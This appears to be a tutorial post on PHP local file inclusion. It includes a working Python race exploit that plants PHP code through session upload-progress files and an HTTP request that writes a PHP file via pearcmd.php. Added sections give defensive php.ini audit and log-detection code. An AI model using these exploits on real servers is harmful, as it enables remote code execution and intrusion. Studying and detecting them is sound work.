Local file inclusion
2022-06-22 11:59:00 【nigo134】
1. Including the local log
First, locate the web server's log file by whatever means are available, then include it with the include technique described above:
param=include$_GET[a];&a=/home/u244201241/.logs/php_error.log
If the web log cannot be found, a race condition that includes a temporary upload file also works.
2. phpinfo and race conditions
Use conditions:
1. A phpinfo page, or another page that discloses temporary file names, is available
2. Network conditions are good enough for the race condition to succeed
Script:
Whenever an upload request is sent to any PHP file, regardless of whether the PHP backend has any logic that handles $_FILES, PHP first saves the uploaded data to a temporary file. This file is usually located in the system's temporary directory, and its name starts with php followed by 6 random characters; once the whole PHP file has finished executing, these temporary upload files are cleaned up.
The condition for exploiting this is that you need somewhere to obtain the file name, for example phpinfo.php: the phpinfo page outputs all information about the request, including the value of the $_FILES variable, which contains the full file name:

3. Clever use of Windows wildcards
When PHP reads a file on Windows it uses the Win32 API FindFirstFileExW to look the file up, and this API supports wildcards:
- DOS_STAR: the character <, matches 0 or more characters
- DOS_QM: the character >, matches exactly 1 character
- DOS_DOT: the character ", matches a dot
So on Windows the random string in the temporary file name can be replaced with these wildcards: C:\Windows\Temp\php<< (for some unclear Windows-internal reason, two < are usually needed to match multiple characters).
4. session.upload_progress and Session file inclusion
PHP can be made to write a temporary file through the session upload-progress feature. The principle: once session.upload_progress.enabled is turned on, information about the file the user is uploading is saved in the Session, and PHP's Session is stored in a file by default.
Use conditions:
1. session.upload_progress.enabled is On (the default is On)
2. session.upload_progress.cleanup is Off (the default is On)
Script:
```python
import threading
import requests
from concurrent.futures import ThreadPoolExecutor, wait

target = 'http://192.168.1.162:8080/index.php'
session = requests.session()
flag = 'helloworld'


def upload(e: threading.Event):
    # Keep sending multipart uploads; PHP stores the PHP_SESSION_UPLOAD_PROGRESS
    # field in the session file sess_<PHPSESSID> while the upload is in progress.
    files = [
        ('file', ('load.png', b'a' * 40960, 'image/png')),
    ]
    data = {'PHP_SESSION_UPLOAD_PROGRESS': rf'''<?php file_put_contents('/tmp/success', '<?=phpinfo()?>'); echo('{flag}'); ?>'''}
    while not e.is_set():
        requests.post(
            target,
            data=data,
            files=files,
            cookies={'PHPSESSID': flag},
        )


def write(e: threading.Event):
    # Race the upload threads: request the session file through the inclusion
    # until the marker echoed by the payload appears in the response.
    while not e.is_set():
        response = requests.get(
            f'{target}?file=/tmp/sess_{flag}',
        )
        if flag.encode() in response.content:
            e.set()


if __name__ == '__main__':
    futures = []
    event = threading.Event()
    pool = ThreadPoolExecutor(15)
    for i in range(10):
        futures.append(pool.submit(upload, event))
    for i in range(5):
        futures.append(pool.submit(write, event))
    wait(futures)
```
5. Clever use of pearcmd.php
Use conditions:
1. PHP is running in server mode
2. register_argc_argv is enabled (Off by default)
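The condition lists of section 4 (session.upload_progress) and section 5 (register_argc_argv) can be checked from the server side as a php.ini audit. The following is an added example written for this post, not code from the original article; it uses a constructed sample config and a minimal ini reader rather than a full php.ini parser.

```python
# Defaults as the post states them (matching PHP's shipped php.ini).
DEFAULTS = {
    "session.upload_progress.enabled": "on",
    "session.upload_progress.cleanup": "on",
    "register_argc_argv": "off",
}

def parse_php_ini(text: str) -> dict:
    """Minimal php.ini reader: ';' comments and [sections] are ignored."""
    directives = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()   # quoted ';' in values not handled
        if not line or line.startswith("[") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        directives[key.strip().lower()] = value.strip().strip('"').lower()
    return directives

def is_on(value: str) -> bool:
    """php.ini booleans: 1/on/true/yes are true, anything else is false."""
    return value in ("1", "on", "true", "yes")

def audit_php_ini(text: str) -> list:
    """Return one finding per risky setting; an empty list means no finding."""
    d = parse_php_ini(text)
    effective = {k: d.get(k, default) for k, default in DEFAULTS.items()}
    findings = []
    if (is_on(effective["session.upload_progress.enabled"])
            and not is_on(effective["session.upload_progress.cleanup"])):
        findings.append("session.upload_progress.cleanup=Off: upload-progress "
                        "data is left in the session file after the request, "
                        "so a file-inclusion bug can include attacker-controlled content")
    if is_on(effective["register_argc_argv"]):
        findings.append("register_argc_argv=On: query-string arguments reach "
                        "$argv, the precondition for the pearcmd.php trick")
    return findings

# Constructed sample config for the demo (not taken from any real server).
SAMPLE_INI = """
[PHP]
; hardening left incomplete
session.upload_progress.enabled = On
session.upload_progress.cleanup = Off   ; should be On
register_argc_argv = On
"""

if __name__ == "__main__":
    for finding in audit_php_ini(SAMPLE_INI):
        print("FINDING:", finding)
```

Directives absent from the file fall back to the defaults above, so an empty config audits clean and turning session.upload_progress.enabled off also silences the cleanup finding.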
Exploitation method:
```http
GET /index.php?+config-create+/&file=/usr/local/lib/php/pearcmd.php&/<?=phpinfo()?>+/tmp/hello.php HTTP/1.1
Host: 192.168.1.162:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Connection: close
```
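The request above, and the file= values used in sections 1, 3 and 4, give a server operator concrete strings to look for in the web access log. The following detector is an added example and not part of the original post; the log lines are constructed, and the combined-log regex and the indicator list are assumptions of this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Combined log format (Apache/nginx): only client, method, target and status are used.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Substrings taken from the post's techniques, matched on the decoded, lower-cased query.
INDICATORS = {
    "pearcmd": ("pearcmd.php", "config-create"),
    "session_file": ("/sess_",),
    "log_file": ("error.log", "access.log", "/.logs/"),
    "tmp_wildcard": ("\\temp\\php<", "/tmp/php"),
}

def classify_request(target: str) -> list:
    """Return the indicator names matched by one request target (after URL-decoding)."""
    parts = urlsplit(target)
    decoded = unquote(parts.query).lower()
    hits = [name for name, needles in INDICATORS.items()
            if any(needle in decoded for needle in needles)]
    # A parameter whose value is an absolute Unix or Windows path is suspicious by itself.
    for _, value in parse_qsl(parts.query):
        if value.startswith("/") or re.match(r"^[a-z]:\\", value, re.I):
            hits.append("absolute_path_param")
            break
    return hits

def scan_log(lines) -> list:
    """Return (ip, target, hits) for every parseable request that matches an indicator."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue
        hits = classify_request(m["target"])
        if hits:
            alerts.append((m["ip"], m["target"], hits))
    return alerts

# Constructed access-log lines for the demo; addresses and timestamps are made up.
SAMPLE_LOG = [
    '10.0.0.5 - - [22/Jun/2022:11:59:00 +0800] "GET /index.php?+config-create+/&file=/usr/local/lib/php/pearcmd.php&/%3C?=phpinfo()?%3E+/tmp/hello.php HTTP/1.1" 200 512 "-" "curl/7.68.0"',
    '10.0.0.5 - - [22/Jun/2022:11:59:03 +0800] "GET /index.php?file=/tmp/sess_helloworld HTTP/1.1" 200 88 "-" "python-requests/2.27"',
    '10.0.0.9 - - [22/Jun/2022:12:00:10 +0800] "GET /index.php?file=C:%5CWindows%5CTemp%5Cphp%3C%3C HTTP/1.1" 500 0 "-" "Mozilla/5.0"',
    '192.0.2.7 - - [22/Jun/2022:12:01:00 +0800] "GET /index.php?file=about HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, target, hits in scan_log(SAMPLE_LOG):
        print(f"{ip} {target} -> {', '.join(hits)}")
```

Matching is done on the URL-decoded query, so the percent-encoded Windows wildcard in the third sample line is still caught; the benign fourth line produces no alert.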